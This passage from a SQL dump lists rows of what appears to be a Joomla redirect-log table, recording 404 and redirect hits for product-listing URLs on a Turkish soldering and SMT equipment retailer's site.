00:00:00',301),(12397,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-10',NULL,'','',4,0,'2017-11-18 23:36:43','0000-00-00 00:00:00',301),(12398,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering/results,1-40',NULL,'','',4,0,'2017-11-18 23:41:43','0000-00-00 00:00:00',301),(12399,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/results,1-50',NULL,'','',3,0,'2017-11-18 23:46:46','0000-00-00 00:00:00',301),(12400,'http://www.3s-technologies.com.tr/en/products/trident-detail?tmpl=component&print=1',NULL,'','',31,0,'2017-11-19 00:03:34','0000-00-00 00:00:00',301),(12401,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-50',NULL,'','',4,0,'2017-11-19 00:06:42','0000-00-00 00:00:00',301),(12402,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-100',NULL,'','',4,0,'2017-11-19 00:06:43','0000-00-00 00:00:00',301),(12403,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-5',NULL,'','',4,0,'2017-11-19 00:27:02','0000-00-00 00:00:00',301),(12404,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-50',NULL,'','',3,0,'2017-11-19 00:52:12','0000-00-00 00:00:00',301),(12405,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-10',NULL,'','',8,0,'2017-11-19 01:02:32','0000-00-00 00:00:00',301),(12406,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,product_sku',NULL,'','',395,0,'2017-11-19 01:02:47','0000-00-00 00:00:00',301),(12407,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-10',NULL,'','',7,0,'2017-11-19 01:07:42','0000-00-00 00:00:00',301),(12408,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-20',NULL,'','',3,0,'2017-11-19 01:12:42','0000-00-00 00:00:00',301),(12409,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-50',NULL,'','',5,0,'2017-11-19 01:12:43','0000-00-00 00:00:00',301),(12410,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2017-11-19 01:23:02','0000-00-00 00:00:00',301),(12411,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/results,1-5',NULL,'','',5,0,'2017-11-19 01:33:23','0000-00-00 00:00:00',301),(12412,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-20',NULL,'','',3,0,'2017-11-19 01:38:21','0000-00-00 00:00:00',301),(12413,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2017-11-19 01:43:20','0000-00-00 00:00:00',301),(12414,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/results,1-50',NULL,'','',1,0,'2017-11-19 01:48:31','0000-00-00 00:00:00',301),(12415,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-19 01:51:06','0000-00-00 00:00:00',301),(12416,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-panasonic6_250x250.jpg',NULL,'','',5,0,'2017-11-19 02:04:10','0000-00-00 00:00:00',301),(12417,'http://3s-technologies.com.tr/index.php/tr/ueruenler/jvk-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-19 02:04:11','0000-00-00 00:00:00',301),(12418,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-11-19 02:06:46','0000-00-00 00:00:00',301),(12419,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/results,1-50',NULL,'','',4,0,'2017-11-19 02:08:52','0000-00-00 00:00:00',301),(12420,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-19 02:15:37','0000-00-00 00:00:00',301),(12421,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2017-11-19 02:29:25','0000-00-00 00:00:00',301),(12422,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering/results,1-100',NULL,'','',1,0,'2017-11-19 02:59:55','0000-00-00 00:00:00',301),(12423,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim-31-32-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-19 03:03:43','0000-00-00 00:00:00',301),(12424,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/results,1-5',NULL,'','',5,0,'2017-11-19 03:05:04','0000-00-00 00:00:00',301),(12425,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/results,1-5',NULL,'','',1,0,'2017-11-19 03:10:02','0000-00-00 00:00:00',301),(12426,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/results,1-10',NULL,'','',3,0,'2017-11-19 03:15:04','0000-00-00 00:00:00',301),(12427,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/results,1-20',NULL,'','',4,0,'2017-11-19 03:15:04','0000-00-00 00:00:00',301),(12428,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-19 03:20:00','0000-00-00 00:00:00',301),(12429,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2017-11-19 03:25:01','0000-00-00 00:00:00',301),(12430,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/dirdesc/results,1-20',NULL,'','',4,0,'2017-11-19 03:25:02','0000-00-00 00:00:00',301),(12431,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',629,0,'2017-11-19 03:27:05','0000-00-00 00:00:00',301),(12432,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,category_name/results,1-20',NULL,'','',4,0,'2017-11-19 03:30:12','0000-00-00 00:00:00',301),(12433,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/dirdesc/results,1-5',NULL,'','',2,0,'2017-11-19 03:30:16','0000-00-00 00:00:00',301),(12434,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,ordering/results,1-5',NULL,'','',6,0,'2017-11-19 03:35:22','0000-00-00 00:00:00',301),(12435,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/results,1-20',NULL,'','',5,0,'2017-11-19 03:40:32','0000-00-00 00:00:00',301),(12436,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,product_sku/results,1-5',NULL,'','',7,0,'2017-11-19 03:45:31','0000-00-00 00:00:00',301),(12437,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-19 03:49:10','0000-00-00 00:00:00',301),(12438,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo',NULL,'','',28,0,'2017-11-19 03:50:42','0000-00-00 00:00:00',301),(12439,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/dirdesc/results,1-20',NULL,'','',4,0,'2017-11-19 03:50:42','0000-00-00 00:00:00',301),(12440,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,product_name/results,1-5',NULL,'','',4,0,'2017-11-19 03:55:43','0000-00-00 00:00:00',301),(12441,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,category_name/results,1-5',NULL,'','',1,0,'2017-11-19 04:10:52','0000-00-00 00:00:00',301),(12442,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo',NULL,'','',5,0,'2017-11-19 04:16:02','0000-00-00 00:00:00',301),(12443,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,mf_name/results,1-10',NULL,'','',7,0,'2017-11-19 04:16:02','0000-00-00 00:00:00',301),(12444,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,category_name/results,1-10',NULL,'','',5,0,'2017-11-19 04:31:21','0000-00-00 00:00:00',301),(12445,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,mf_name/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-11-19 04:49:37','0000-00-00 00:00:00',301),(12446,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by,product_name/results,1-50?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-19 05:01:56','0000-00-00 00:00:00',301),(12447,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/results,1-50',NULL,'','',7,0,'2017-11-19 05:06:52','0000-00-00 00:00:00',301),(12448,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-19 05:08:27','0000-00-00 00:00:00',301),(12449,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku',NULL,'','',3,0,'2017-11-19 05:11:14','0000-00-00 00:00:00',301),(12450,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,`p`.product_sku',NULL,'','',2,0,'2017-11-19 05:16:39','0000-00-00 00:00:00',301),(12451,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,category_name/dirdesc',NULL,'','',2,0,'2017-11-19 05:16:44','0000-00-00 00:00:00',301),(12452,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/results,1-40',NULL,'','',9,0,'2017-11-19 05:16:51','0000-00-00 00:00:00',301),(12453,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/results,1-10',NULL,'','',5,0,'2017-11-19 05:16:53','0000-00-00 00:00:00',301),(12454,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name',NULL,'','',6,0,'2017-11-19 05:17:22','0000-00-00 00:00:00',301),(12455,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,mf_name/results,1-5',NULL,'','',4,0,'2017-11-19 05:27:01','0000-00-00 00:00:00',301),(12456,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/dirdesc/results,1-40',NULL,'','',7,0,'2017-11-19 05:27:01','0000-00-00 00:00:00',301),(12457,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/results,1-5',NULL,'','',4,0,'2017-11-19 05:32:12','0000-00-00 00:00:00',301),(12458,'http://3s-technologies.com.tr/index.php/en/products/245-sn63pb37-0.4mm-29-detail?print=1&tmpl=component',NULL,'','',2,0,'2017-11-19 05:34:16','0000-00-00 00:00:00',301),(12459,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim',NULL,'','',43,0,'2017-11-19 05:34:52','0000-00-00 00:00:00',301),(12460,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',187,0,'2017-11-19 05:37:21','0000-00-00 00:00:00',301),(12461,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',5,0,'2017-11-19 05:42:21','0000-00-00 00:00:00',301),(12462,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/results,1-50',NULL,'','',5,0,'2017-11-19 05:47:23','0000-00-00 00:00:00',301),(12463,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/results,1-5',NULL,'','',5,0,'2017-11-19 05:52:30','0000-00-00 00:00:00',301),(12464,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name?error=404&language=en-gb',NULL,'','',1,0,'2017-11-19 06:09:44','0000-00-00 00:00:00',301),(12465,'http://3s-technologies.com.tr/tr/urunler/am100-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-11-19 06:20:43','0000-00-00 00:00:00',301),(12466,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-19 06:23:04','0000-00-00 00:00:00',301),(12467,'http://3s-technologies.com.tr/en/products/ls60v-detail?tmpl=component&print=1',NULL,'','',17,0,'2017-11-19 06:25:38','0000-00-00 00:00:00',301),(12468,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/dalga-lehim/by,product_name',NULL,'','',1,0,'2017-11-19 06:35:16','0000-00-00 00:00:00',301),(12469,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,category_name',NULL,'','',237,0,'2017-11-19 06:39:14','0000-00-00 00:00:00',301),(12470,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-40',NULL,'','',5,0,'2017-11-19 06:43:02','0000-00-00 00:00:00',301),(12471,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-detail',NULL,'','',181,0,'2017-11-19 06:46:47','0000-00-00 00:00:00',301),(12472,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,ordering',NULL,'','',3,0,'2017-11-19 06:48:01','0000-00-00 00:00:00',301),(12473,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-19 07:12:46','0000-00-00 00:00:00',301),(12474,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,category_name',NULL,'','',4,0,'2017-11-19 07:18:32','0000-00-00 00:00:00',301),(12475,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',34,0,'2017-11-19 07:22:52','0000-00-00 00:00:00',301),(12476,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturers/tolo',NULL,'','',16,0,'2017-11-19 07:23:32','0000-00-00 00:00:00',301),(12477,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-100',NULL,'','',6,0,'2017-11-19 07:23:33','0000-00-00 00:00:00',301),(12478,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,product_name',NULL,'','',2,0,'2017-11-19 07:28:41','0000-00-00 00:00:00',301),(12479,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,`p`.product_sku',NULL,'','',4,0,'2017-11-19 07:28:42','0000-00-00 00:00:00',301),(12480,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/thru-hole',NULL,'','',16,0,'2017-11-19 07:33:41','0000-00-00 00:00:00',301),(12481,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/results,1-10',NULL,'','',6,0,'2017-11-19 07:33:42','0000-00-00 00:00:00',301),(12482,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',6,0,'2017-11-19 07:38:45','0000-00-00 00:00:00',301),(12483,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturers/tolo',NULL,'','',8,0,'2017-11-19 07:43:51','0000-00-00 00:00:00',301),(12484,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,pc.ordering,product_name',NULL,'','',8,0,'2017-11-19 07:43:51','0000-00-00 00:00:00',301),(12485,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-19 07:48:08','0000-00-00 00:00:00',301),(12486,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',1,0,'2017-11-19 07:49:01','0000-00-00 00:00:00',301),(12487,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku/results,1-10',NULL,'','',2,0,'2017-11-19 07:49:02','0000-00-00 00:00:00',301),(12488,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/results,1-20',NULL,'','',1,0,'2017-11-19 07:54:23','0000-00-00 00:00:00',301),(12489,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,ordering/results,1-5',NULL,'','',3,0,'2017-11-19 07:59:22','0000-00-00 00:00:00',301),(12490,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,mf_name/dirdesc',NULL,'','',4,0,'2017-11-19 08:04:21','0000-00-00 00:00:00',301),(12491,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku/results,1-40',NULL,'','',3,0,'2017-11-19 08:09:21','0000-00-00 00:00:00',301),(12492,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,ordering/results,1-50',NULL,'','',4,0,'2017-11-19 08:09:22','0000-00-00 00:00:00',301),(12493,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/results,1-10',NULL,'','',7,0,'2017-11-19 08:14:21','0000-00-00 00:00:00',301),(12494,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,mf_name/results,1-5',NULL,'','',4,0,'2017-11-19 08:19:30','0000-00-00 00:00:00',301),(12495,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,ordering/results,1-20',NULL,'','',4,0,'2017-11-19 08:19:31','0000-00-00 00:00:00',301),(12496,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/spartan-8s-8d-detail/askquestion?tmpl=component',NULL,'','',19,0,'2017-11-19 08:20:28','0000-00-00 00:00:00',301),(12497,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',10,0,'2017-11-19 08:24:41','0000-00-00 00:00:00',301),(12498,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,ordering/results,1-10',NULL,'','',8,0,'2017-11-19 08:29:43','0000-00-00 00:00:00',301),(12499,'http://www.3s-technologies.com.tr/index.php/en/products/le-40v-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-19 08:31:10','0000-00-00 00:00:00',301),(12500,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,mf_name/results,1-50',NULL,'','',4,0,'2017-11-19 08:35:03','0000-00-00 00:00:00',301),(12501,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,product_name/results,1-5',NULL,'','',6,0,'2017-11-19 09:05:22','0000-00-00 00:00:00',301),(12502,'http://3s-technologies.com.tr/index.php/en/products/gf-12-hc-ht-detail?tmpl=component&print=1',NULL,'','',12,0,'2017-11-19 09:16:15','0000-00-00 00:00:00',301),(12503,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-19 09:17:51','0000-00-00 00:00:00',301),(12504,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/results,1-50',NULL,'','',2,0,'2017-11-19 09:20:40','0000-00-00 00:00:00',301),(12505,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_sku/results,1-5',NULL,'','',4,0,'2017-11-19 09:20:41','0000-00-00 00:00:00',301),(12506,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,product_name/results,1-10',NULL,'','',4,0,'2017-11-19 09:25:41','0000-00-00 00:00:00',301),(12507,'http://3s-technologies.com.tr/index.php/tr/ueruenler/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',15,0,'2017-11-19 09:29:55','0000-00-00 00:00:00',301),(12508,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,product_name/results,1-10',NULL,'','',1,0,'2017-11-19 09:30:42','0000-00-00 00:00:00',301),(12509,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_sku/results,1-50',NULL,'','',1,0,'2017-11-19 09:35:41','0000-00-00 00:00:00',301),(12510,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name/results,1-5',NULL,'','',2,0,'2017-11-19 09:35:42','0000-00-00 00:00:00',301),(12511,'http://3s-technologies.com.tr/tr/http:/',NULL,'','',1,0,'2017-11-19 09:37:52','0000-00-00 00:00:00',301),(12512,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,mf_name?language=tr-tr',NULL,'','',1,0,'2017-11-19 09:39:42','0000-00-00 00:00:00',301),(12513,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,product_name/results,1-50',NULL,'','',7,0,'2017-11-19 09:40:41','0000-00-00 00:00:00',301),(12514,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name/results,1-10',NULL,'','',4,0,'2017-11-19 09:40:42','0000-00-00 00:00:00',301),(12515,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_sku/results,1-10',NULL,'','',4,0,'2017-11-19 09:45:51','0000-00-00 00:00:00',301),(12516,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,product_name/results,1-20',NULL,'','',1,0,'2017-11-19 09:51:01','0000-00-00 00:00:00',301),(12517,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name/results,1-50',NULL,'','',3,0,'2017-11-19 09:51:02','0000-00-00 00:00:00',301),(12518,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/results,1-5',NULL,'','',3,0,'2017-11-19 09:56:01','0000-00-00 00:00:00',301),(12519,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,pc.ordering,product_name/results,1-5',NULL,'','',3,0,'2017-11-19 10:01:11','0000-00-00 00:00:00',301),(12520,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_sku/results,1-20',NULL,'','',1,0,'2017-11-19 10:06:11','0000-00-00 00:00:00',301),(12521,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku/results,1-20',NULL,'','',1,0,'2017-11-19 10:06:15','0000-00-00 00:00:00',301),(12522,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,pc.ordering,product_name/results,1-10',NULL,'','',5,0,'2017-11-19 10:11:20','0000-00-00 00:00:00',301),(12523,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku/results,1-10',NULL,'','',4,0,'2017-11-19 10:16:21','0000-00-00 00:00:00',301),(12524,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku/results,1-20',NULL,'','',1,0,'2017-11-19 10:21:31','0000-00-00 00:00:00',301),(12525,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,pc.ordering,product_name/results,1-50',NULL,'','',4,0,'2017-11-19 10:21:32','0000-00-00 00:00:00',301),(12526,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/results,1-10',NULL,'','',3,0,'2017-11-19 10:26:29','0000-00-00 00:00:00',301),(12527,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,pc.ordering,product_name/results,1-20',NULL,'','',1,0,'2017-11-19 10:31:41','0000-00-00 00:00:00',301),(12528,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku/results,1-100',NULL,'','',4,0,'2017-11-19 10:36:51','0000-00-00 00:00:00',301),(12529,'http://www.3s-technologies.com.tr/en/products/manufacturers/panasonic',NULL,'','',71,0,'2017-11-19 10:50:31','0000-00-00 00:00:00',301),(12530,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/mi-300-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-19 10:57:23','0000-00-00 00:00:00',301),(12531,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/results,1-10',NULL,'','',13,0,'2017-11-19 11:22:40','0000-00-00 00:00:00',301),(12532,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/results,1-20',NULL,'','',1,0,'2017-11-19 11:27:49','0000-00-00 00:00:00',301),(12533,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/dirdesc',NULL,'','',7,0,'2017-11-19 11:36:41','0000-00-00 00:00:00',301),(12534,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/results,1-50',NULL,'','',4,0,'2017-11-19 11:38:01','0000-00-00 00:00:00',301),(12535,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/results,1-20',NULL,'','',6,0,'2017-11-19 11:38:02','0000-00-00 00:00:00',301),(12536,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,ordering/results,1-5?language=en-gb',NULL,'','',1,0,'2017-11-19 11:43:08','0000-00-00 00:00:00',301),(12537,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/results,1-5',NULL,'','',2,0,'2017-11-19 11:48:00','0000-00-00 00:00:00',301),(12538,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by?`p`.product_sku/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-19 11:52:33','0000-00-00 00:00:00',301),(12539,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/results,1-50',NULL,'','',7,0,'2017-11-19 11:58:25','0000-00-00 00:00:00',301),(12540,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',25,0,'2017-11-19 12:01:05','0000-00-00 00:00:00',301),(12541,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/results,1-20',NULL,'','',1,0,'2017-11-19 12:08:40','0000-00-00 00:00:00',301),(12542,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/results,1-50',NULL,'','',1,0,'2017-11-19 12:19:03','0000-00-00 00:00:00',301),(12543,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/rl132-detail',NULL,'','',29,0,'2017-11-19 12:19:16','0000-00-00 00:00:00',301),(12544,'http://3s-technologies.com.tr/index.php/en/products/flux/by,product_name/dirdesc?language=en-gb',NULL,'','',9,0,'2017-11-19 12:33:10','0000-00-00 00:00:00',301),(12545,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,mf_name',NULL,'','',5,0,'2017-11-19 12:39:11','0000-00-00 00:00:00',301),(12546,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın',NULL,'','',400,0,'2017-11-19 12:47:04','0000-00-00 00:00:00',301),(12547,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,ordering?language=tr-tr',NULL,'','',7,0,'2017-11-19 12:54:58','0000-00-00 